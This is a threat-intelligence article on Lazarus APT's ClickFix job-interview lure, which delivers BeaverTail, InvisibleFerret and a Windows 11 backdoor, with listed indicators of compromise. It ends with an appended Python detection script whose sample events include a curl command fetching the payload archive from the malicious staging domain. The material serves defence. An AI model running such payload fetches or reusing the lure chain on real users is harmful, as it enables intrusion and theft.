Lazarus APT Deploys ClickFix Technique to Exfiltrate Sensitive Intelligence Data

The notorious Lazarus APT group, suspected of having Northeast Asian origins and internally tracked as APT-Q-1 by Qi’anxin, has evolved its attack methodologies by incorporating the sophisticated ClickFix social engineering technique into their cyber espionage operations.

This development represents a significant escalation in the group’s capabilities to deceive victims and steal sensitive intelligence data through increasingly deceptive means.

Lazarus gained international notoriety following its devastating 2014 attack on Sony Pictures, though the group’s malicious activities trace back to 2007.

Initially focused on targeting government agencies to extract sensitive intelligence, Lazarus expanded its scope after 2014 to include global financial institutions, cryptocurrency exchanges, and other high-value targets.

The group has consistently employed fake social media accounts disguised as legitimate job opportunities to launch targeted phishing campaigns against individuals in specific industries.

ClickFix represents a modern social engineering attack vector that exploits human psychology by presenting victims with fabricated technical problems.

Attackers display non-existent system faults and manipulate victims into following specific instructions to “resolve” these issues.

The victim unknowingly executes what appears to be a legitimate fix but is actually disguised malicious code.

Lazarus has seamlessly integrated ClickFix tactics into their phishing operations using fraudulent job postings as initial lure mechanisms. The attack sequence follows a carefully orchestrated pattern:

Attack Vector and Execution

Victims receive enticing fake job offers that direct them to attacker-controlled interview websites.

During the simulated interview process, the malicious site strategically prompts users that their camera configuration is inadequate or malfunctioning.

The site then provides a “solution” that appears to be a legitimate Nvidia software update but actually serves as a delivery mechanism for sophisticated malware.

Recent analysis by the Qi’anxin Threat Intelligence Center uncovered a batch script directly linked to Lazarus ClickFix operations that downloads fraudulent Nvidia software packages.

This malware package subsequently deploys a Node.js environment to execute the BeaverTail malware, a signature tool commonly utilized by the Lazarus organization.

The attack chain begins with ClickFix-1.bat, which downloads a malicious compressed package from hxxps://driverservices.store/visiodrive/nvidiaRelease.zip.

The package contains multiple components including run.vbs, shell.bat, main.js (BeaverTail stealer), and drvUpdate.exe (a backdoor specifically targeting Windows 11 systems).

The run.vbs script performs system reconnaissance, checking if the operating system BuildNumber reaches 22000 (Windows 11 identifier) before executing the backdoored drvUpdate.exe.

It also verifies Node.js installation status to determine the appropriate execution path for subsequent malicious scripts.

This campaign demonstrates cross-platform capabilities, affecting both Windows and macOS systems.

For macOS targets, attackers utilize variants disguised as arm64-fixer packages, maintaining the same deceptive approach while adapting to different operating system architectures.

Advanced Persistent Mechanisms

The BeaverTail malware serves as the primary intelligence gathering component, connecting to command and control servers at hxxp://45.159.248.110.

This cross-platform stealer subsequently downloads and deploys the InvisibleFerret Python Trojan, establishing persistent access through registry modifications and scheduled tasks.

For Windows 11 systems, the drvUpdate.exe backdoor provides attackers with comprehensive system control capabilities, including command execution, file manipulation, and system information collection.

The backdoor connects to 103.231.75.101:8888 and supports various instruction codes for different malicious operations.

Security researchers attribute these samples to Lazarus based on code similarities with previously documented campaigns and the deployment of signature malware families including BeaverTail and InvisibleFerret.

The backdoor checks that the C2 server is reachable by sending it a challenge message and comparing the data it receives in return.

The group’s consistent use of fake driver updates and social engineering techniques reinforces this attribution assessment.

Defense Recommendations

Organizations and individuals should implement comprehensive security measures including user education about social engineering tactics, email security filtering, and endpoint detection systems.

Users must exercise extreme caution when prompted to download or execute software from unfamiliar websites, particularly during online interviews or recruitment processes.

Multi-factor authentication, regular security awareness training, and incident response planning remain critical components of effective defense strategies against sophisticated APT groups like Lazarus.

Security teams should monitor for indicators of compromise associated with ClickFix techniques and maintain updated threat intelligence feeds to identify emerging attack patterns.
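As an added defender's example (not code from the report or from Qi'anxin), the Python below scans constructed process-creation events for the chain described above: the batch file fetching nvidiaRelease.zip from the staging domain, a script host (run.vbs) launching Node.js for main.js or drvUpdate.exe, and references to the listed C2 addresses. The event format, sample lines and the two-reason threshold are assumptions.

```python
import re
from collections import defaultdict

# Indicators quoted in the report (the article defangs the URLs as hxxp/hxxps).
IOC_HOSTS = {"driverservices.store", "45.159.248.110", "103.231.75.101"}
STAGE_FILES = {"clickfix-1.bat", "nvidiarelease.zip", "run.vbs",
               "shell.bat", "main.js", "drvupdate.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Constructed sample process-creation events, not real telemetry.
SAMPLE_EVENTS = [
    "host=ws01 parent=explorer.exe image=cmd.exe cmd=cmd.exe /c C:\\Users\\u\\Downloads\\ClickFix-1.bat",
    "host=ws01 parent=cmd.exe image=curl.exe cmd=curl.exe -o nvidiaRelease.zip https://driverservices.store/visiodrive/nvidiaRelease.zip",
    "host=ws01 parent=wscript.exe image=node.exe cmd=node.exe C:\\Temp\\nvidiaRelease\\main.js",
    "host=ws01 parent=wscript.exe image=drvUpdate.exe cmd=drvUpdate.exe",
    "host=ws02 parent=explorer.exe image=node.exe cmd=node.exe C:\\dev\\app\\server.js",
]

EVENT_RE = re.compile(r"host=(\S+) parent=(\S+) image=(\S+) cmd=(.*)")

def parse_event(line):
    """Split one key=value event line into a dict; cmd keeps the rest of the line."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    host, parent, image, cmd = m.groups()
    return {"host": host, "parent": parent.lower(), "image": image.lower(), "cmd": cmd}

def classify(ev):
    """Return the reasons an event matches the ClickFix chain from the report."""
    reasons = []
    cmd = ev["cmd"].lower()
    if any(h in cmd for h in IOC_HOSTS):
        reasons.append("contacts staging/C2 host from the report")
    # Bare file names from the command line (path stripped) plus the image name.
    names = {re.split(r"[\\/]", tok)[-1] for tok in cmd.split()} | {ev["image"]}
    for name in sorted(names & STAGE_FILES):
        reasons.append("references stage artefact " + name)
    # run.vbs launches Node.js (BeaverTail) or drvUpdate.exe from a script host.
    if ev["parent"] in SCRIPT_HOSTS and ev["image"] in {"node.exe", "drvupdate.exe"}:
        reasons.append("script host spawned " + ev["image"])
    return reasons

def detect(lines):
    """Aggregate reasons per host; report a host once at least two distinct reasons fire."""
    per_host = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if ev:
            per_host[ev["host"]].update(classify(ev))
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= 2}
```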

The evolution of Lazarus tactics demonstrates the persistent threat posed by state-sponsored cyber espionage groups and underscores the importance of maintaining robust cybersecurity postures across both corporate and individual environments.
